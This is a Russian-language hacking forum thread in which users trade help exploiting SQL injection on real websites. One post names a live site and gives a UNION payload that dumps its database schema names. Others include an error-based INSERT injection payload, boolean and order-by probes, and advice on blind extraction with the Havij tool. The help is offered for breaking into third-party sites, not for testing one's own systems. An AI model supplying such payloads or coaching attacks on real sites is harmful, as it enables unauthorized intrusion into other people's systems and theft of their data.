Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    полюбому нужно чтоб сервер обрабатывал jpeg как php сценарии, чтоб код в exif исполнялся
     
    _________________________
  2. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    http://www.artplast-100.ru/news/22/
    http://www.artplast-100.ru/news/22-2/
    как быть в таком случае?
    http://www.artplast-100.ru/news/22 or 1=1/
    http://www.artplast-100.ru/news/22/**/or/**/1=1/*/
    и т д.
     
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://www.artplast-100.ru/news/(-22)union(select(1),(select(group_concat(schema_name))from(information_schema.schemata)),3,4,5,6)/
    но все данные могут не влезть
    подробный ман
     
    #19383 Melfis, 16 Feb 2012
    Last edited: 16 Feb 2012
  4. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Добрый день
    Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
    Вот так можно ли это раскрутить и как за ранее спс!
     
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\
    Code:
    [COLOR=Red]',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'[/COLOR]
     
    1 person likes this.
  6. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Это оч просто и всего лишь 2 варианта:
    1. простой - короткий и понятный ман
    2. сложный - использование программ для автоматической раскрутки скулей.

    Д ты хрен угадаешь что у него там )
     
    #19386 Melfis, 16 Feb 2012
    Last edited: 16 Feb 2012
    1 person likes this.
  7. TYPUCT

    TYPUCT New Member

    Joined:
    7 Sep 2010
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит?

    Data Base: J.I~?rl21m)" x~^xk[rr?xWP}S(
    Length of 'Data Base' is 17
    Data Base: Z.F?`W!e?no]2f3kx
    Length of 'Data Base' is 48
    Data Base: Gf1?z@D??A&> ]{ijE&??;xLx?oZ/V?5QzRkq3
     
  8. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    мм

    делал по манулу http://forum.antichat.ru/thread43966.html
    выбивает ошибку
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6 --', 'ип', 'ваываыв', '2012-02-16 16:34:05',' at line 1
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    TYPUCT, потому что руками надо делать :)
    кодировка
    Revi, ты уверен что там 6?
    да и не в этом суть.
    экстрасенсы не знают что делать
    может пруф уже скинешь, нет?
    так вряд ли помогут
     
    _________________________
  10. TYPUCT

    TYPUCT New Member

    Joined:
    7 Sep 2010
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Тама млин блайнд, сейчас ковыряюсь, посмотрим.
     
  11. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    линк кину в лс
    В комментариях не фильтруется ник и текст.
    Жду с нетерпением
     
    #19391 Revi, 16 Feb 2012
    Last edited: 16 Feb 2012
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Проблема не в том, что SQL BLIND, а в том что Havij похоже крутит её не через ascii(substring(database(),X,1))=Y а через Time-Based SQL

    Как вы уже знаете, данный вид скули сильно зависит от стабильности канала.

    Будет лагать канал - получите где то такую же тарабарщину.
     
    _________________________
  13. james00x

    james00x New Member

    Joined:
    6 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Привет
    получаю следующую ситуацию:
    Code:
    /Index.php/cPath/1'
    показывает
    Code:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
    Как дальше? Софт ест для это?
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Руки для этого есть...

    Code:
    /Index.php/cPath/1/**/and/**/1=1/**/--
    
    /Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/X/**/--
    
     
    _________________________
  15. james00x

    james00x New Member

    Joined:
    6 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0


    Code:
    /Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/5456443/**/--
    не показывает ошибки
     
  16. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Доброго времени суток.
    Такой вопрос появился. Есть скуля благо POST запросу.
    С кавычкой, выдает в самом верху сайта на белом фоне: "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in..."
    Отлично подобрал столбцы. union select 1,2 --, как видим, оказалось 2, ошибка исчезла. Но и не появились поля где может быть скуля. Тобишь не единицы, ни двойки. Решил я подставить что то по типу: version() user() database(). Что тоже не дало никакого результата, кроме того что ошибка исчезала.
    Вопрос таков, как выйти из этой ситуации, как можно добиться вывода? Или вообще как тут поступать?
     
  17. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    Раскручивай как error-based. Подробнее в гайде от Dr.Zero, найдешь на форуме.
     
  18. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Machine,
    http://forum.antichat.ru/member.php?u=102727
    ? oO
     
  19. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    :)

    _https://forum.antichat.ru/thread43966-sql+injection+%EF%EE%EB%ED%FB%E9.html
     
  20. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Хоть что-нибудь работающее с basic авторизацией+Postgres есть ? Ни хавай,ни бскл во free mode пахать не хотят
     
Thread Status:
Not open for further replies.